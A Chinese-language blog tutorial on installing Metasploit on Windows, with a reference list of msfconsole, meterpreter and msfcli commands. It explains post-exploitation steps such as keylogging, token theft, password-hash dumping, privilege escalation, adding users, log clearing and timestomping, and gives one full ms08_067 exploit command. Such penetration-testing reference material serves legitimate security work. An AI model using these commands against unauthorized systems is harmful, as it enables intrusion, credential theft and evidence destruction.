metasploit工具的Windows版安裝及使用教程

msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一個“一體化”的集中控制檯,並允許您高效地訪問MSF中幾乎所有可用的選項。MSFconsole一開始可能看起來有些嚇人,但是一旦您瞭解了命令的語法,您就會了解利用這個接口的強大功能。
在這裏插入圖片描述

點擊下載

安裝

解壓安裝包後直接點擊安裝
在這裏插入圖片描述
添加環境變量
在這裏插入圖片描述

使用

打開終端輸入msfconsole直接使用
在這裏插入圖片描述

常用命令

msfconsole命令

show exploits
列出metasploit框架中的所有滲透攻擊模塊。

show payloads
列出metasploit框架中的所有攻擊載荷。

show auxiliary
列出metasploit框架中的所有輔助攻擊載荷。

search name
查找metasploit框架中所有的滲透攻擊和其他模塊。

info
展示出制定滲透攻擊或模塊的相關信息。

use name
裝載一個滲透攻擊或模塊。

LHOST
你本地可以讓目標主機連接的IP地址,通常當目標主機不在同一個局域網內時,就需要是一個公共IP地址,特別爲反彈式shell使用。

RHOST
遠程主機或是目標主機。

set function
設置特定的配置參數(EG:設置本地或遠程主機參數)。

setg function
以全局方式設置特定的配置參數(EG:設置本地或遠程主機參數)。

show options
列出某個滲透攻擊或模塊中所有的配置參數。

show targets
列出滲透攻擊所有支持的目標平臺。

set target num
指定你所知道的目標的操作系統以及補丁版本類型。

set payload name
指定想要使用的攻擊載荷。

show advanced
列出所有高級配置選項。

set autorunscript migrate -f.
在滲透攻擊完成後,將自動遷移到另一個進程。

check
檢測目標是否選定滲透攻擊存在相應的安全漏洞。

exploit
執行滲透攻擊或模塊來攻擊目標。

exploit -j
在計劃任務下進行滲透攻擊(攻擊將在後臺進行)。

exploit -z
滲透攻擊完成後不與回話進行交互。

exploit -e encoder
制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)。

exploit -h
列出exploit命令的幫助信息。

sessions -l
列出可用的交互會話(在處理多個shell時使用)。

sessions -l -v
列出所有可用的交互會話以及詳細信息,EG:攻擊系統時使用了哪個安全漏洞。

sessions -s script
在所有活躍的metasploit會話中運行一個特定的metasploit腳本。

sessions -K
殺死所有活躍的交互會話。

sessions -c cmd
在所有活躍的metasploit會話上執行一個命令。

sessions -u sessionID
升級一個普通的win32 shell到metasploit shell。

db_create name
創建一個數據庫驅動攻擊所要使用的數據庫(EG:db_create autopwn)。

db_connect name
創建並連接一個數據庫驅動攻擊所要使用的數據庫(EG:db_connect user:passwd@ip/sqlname)。

db_namp
利用nmap並把掃描數據存儲到數據庫中(支持普通的nmap語句,EG:-sT -v -P0)。

db_autopwn -h
展示出db_autopwn命令的幫助信息。

db_autopwn -p -r -e
對所有發現的開放端口執行db_autopwn,攻擊所有系統,並使用一個反彈式shell。

db_destroy
刪除當前數據庫。

db_destroy user:passwd@host:port/database
使用高級選項來刪除數據庫。

metasploit命令

help
打開meterpreter使用幫助。

run scriptname
運行meterpreter腳本,在scripts/meterpreter目錄下可查看到所有腳本名。

sysinfo
列出受控主機的系統信息。

ls
列出目標主機的文件和文件夾信息。

use priv
加載特權提升擴展模塊,來擴展metasploit庫。

ps
顯示所有運行的進程以及相關聯的用戶賬戶。

migrate PID
遷移到一個指定的進程ID(PID號可通過ps命令從主機上獲得)。

use incognito
加載incognito功能(用來盜竊目標主機的令牌或假冒用戶)

list_tokens -u
列出目標主機用戶的可用令牌。

list_tokens -g
列出目標主機用戶組的可用令牌。

impersonate_token DOMAIN_NAME\USERNAME
假冒目標主機上的可用令牌。

steal_token PID
盜竊給定進程的可用令牌並進行令牌假冒。

drop_token
停止假冒當前令牌。

getsystem
通過各種攻擊向量來提升系統用戶權限。

execute -f cmd.exe -i
執行cmd.exe命令並進行交互。

execute -f cmd.exe -i -t
以所有可用令牌來執行cmd命令並隱藏該進程。

rev2self
回到控制目標主機的初始用戶賬戶下。

reg command
在目標主機註冊表中進行交互,創建,刪除,查詢等操作。

setdesktop number
切換到另一個用戶界面(該功能基於那些用戶已登錄)。

screenshot
對目標主機的屏幕進行截圖。

upload file
向目標主機上傳文件。

download file
從目標主機下載文件。

keyscan_start
針對遠程目標主機開啓鍵盤記錄功能。

keyscan_dump
存儲目標主機上捕獲的鍵盤記錄。

keyscan_stop
停止針對目標主機的鍵盤記錄。

getprivs
儘可能多的獲取目標主機上的特權。

uictl enable keyboard/mouse
接管目標主機的鍵盤和鼠標。

background
將你當前的metasploit shell轉爲後臺執行。

hashdump
導出目標主機中的口令哈希值。

use sniffer
加載嗅探模式。

sniffer_interfaces
列出目標主機所有開放的網絡端口。

sniffer_dump interfaceID pcapname
在目標主機上啓動嗅探。

sniffer_start interfaceID packet-buffer
在目標主機上針對特定範圍的數據包緩衝區啓動嗅探。

sniffer_stats interfaceID
獲取正在實施嗅探網絡接口的統計數據。

sniffer_stop interfaceID
停止嗅探。

add_user username password -h ip
在遠程目標主機上添加一個用戶。

clearev
清楚目標主機上的日誌記錄。

timestomp
修改文件屬性,例如修改文件的創建時間(反取證調查)。

reboot
重啓目標主機。

MSFcli命令

msfcli | grep exploit
僅列出滲透攻擊模塊。

msfcli | grep exploit/windows
僅列出與windows相關的滲透攻擊模塊。

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
對IP發起ms08_067_netapi滲透攻擊,配置了bind_tcp攻擊載荷,並綁定在PORT端口進行監聽。
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章